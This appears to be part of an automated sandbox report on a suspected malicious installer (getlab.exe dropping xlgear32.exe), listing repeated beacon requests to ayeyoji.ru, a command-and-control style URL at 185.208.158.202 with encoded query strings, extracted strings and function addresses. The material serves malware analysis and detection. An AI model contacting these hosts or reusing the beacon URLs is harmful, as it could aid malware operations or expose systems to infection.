                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficDNS traffic detected: DNS query: ayeyoji.ru
                    Source: xlgear32.exe, 00000004.00000002.2936299565.00000000008FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.202/
                    Source: xlgear32.exe, 00000004.00000002.2937621128.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2937742375.000000000345C000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2937621128.00000000033A7000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2937621128.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2936299565.00000000008C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958
                    Source: xlgear32.exe, 00000004.00000002.2936299565.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2936299565.00000000008FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
                    Source: getlab.tmp, getlab.tmp, 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-UJ38T.tmp.1.dr, getlab.tmp.0.drString found in binary or memory: http://www.innosetup.com/
                    Source: getlab.exe, 00000000.00000003.1677005829.0000000002268000.00000004.00001000.00020000.00000000.sdmp, getlab.exe, 00000000.00000003.1676863015.0000000002490000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, getlab.tmp, 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-UJ38T.tmp.1.dr, getlab.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
                    Source: getlab.exe, 00000000.00000003.1677005829.0000000002268000.00000004.00001000.00020000.00000000.sdmp, getlab.exe, 00000000.00000003.1676863015.0000000002490000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-UJ38T.tmp.1.dr, getlab.tmp.0.drString found in binary or memory: http://www.remobjects.com/psU
                    Source: getlab.tmp, 00000001.00000002.2936760839.00000000059A3000.00000004.00001000.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000000.1689308145.00000000004CA000.00000002.00000001.01000000.00000008.sdmp, BridgeGamer.exe.4.dr, is-S3UFM.tmp.1.dr, xlgear32.exe.1.drString found in binary or memory: http://www.zldo.narod.ru/plugins.html
                    Source: getlab.exe, 00000000.00000002.2936190021.0000000002261000.00000004.00001000.00020000.00000000.sdmp, getlab.exe, 00000000.00000003.1676529645.0000000002261000.00000004.00001000.00020000.00000000.sdmp, getlab.exe, 00000000.00000003.1676461165.0000000002490000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, 00000001.00000003.1678285601.0000000003110000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, 00000001.00000002.2936078014.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, getlab.tmp, 00000001.00000003.1678355074.0000000002168000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, 00000001.00000002.2936394282.0000000002168000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
                    Source: is-4GRQU.tmp.1.drBinary or memory string: DirectDrawCreateExmemstr_d094a741-8
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0042F518 NtdllDefWindowProc_A,1_2_0042F518
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00423B7C NtdllDefWindowProc_A,1_2_00423B7C
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00478554 NtdllDefWindowProc_A,1_2_00478554
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004125D0 NtdllDefWindowProc_A,1_2_004125D0
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004573B4 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_004573B4
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0042E92C: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E92C
                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004555B8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555B8
                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_0040840C0_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004800021_2_00480002
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004704C81_2_004704C8
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004671CC1_2_004671CC
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004352C01_2_004352C0
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004861401_2_00486140
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004303541_2_00430354
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004444C01_2_004444C0
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004345BC1_2_004345BC
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00444A681_2_00444A68
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00430EE01_2_00430EE0
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0045EEEC1_2_0045EEEC
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0045AF941_2_0045AF94
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004870A01_2_004870A0
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004451601_2_00445160
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0046922C1_2_0046922C
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0048D4001_2_0048D400
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0044556C1_2_0044556C
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004519901_2_00451990
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0043DD481_2_0043DD48
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_004010514_2_00401051
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_00401C264_2_00401C26
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_004070A74_2_004070A7
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_609660FA4_2_609660FA
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6092114F4_2_6092114F
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6091F2C94_2_6091F2C9
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6096923E4_2_6096923E
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6093323D4_2_6093323D
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6095C3144_2_6095C314
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_609503124_2_60950312
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6094D33B4_2_6094D33B
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6093B3684_2_6093B368
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6096748C4_2_6096748C
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6093F42E4_2_6093F42E
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_609544704_2_60954470
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_609615FA4_2_609615FA
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6096A5EE4_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6096D6A44_2_6096D6A4
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_609606A84_2_609606A8
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_609326544_2_60932654
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_609556654_2_60955665
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6094B7DB4_2_6094B7DB
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6092F74D4_2_6092F74D
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_609648074_2_60964807
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6094E9BC4_2_6094E9BC
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_609379294_2_60937929
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6093FAD64_2_6093FAD6
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6096DAE84_2_6096DAE8
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6094DA3A4_2_6094DA3A
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60936B274_2_60936B27
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60954CF64_2_60954CF6
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60950C6B4_2_60950C6B
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60966DF14_2_60966DF1
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60963D354_2_60963D35
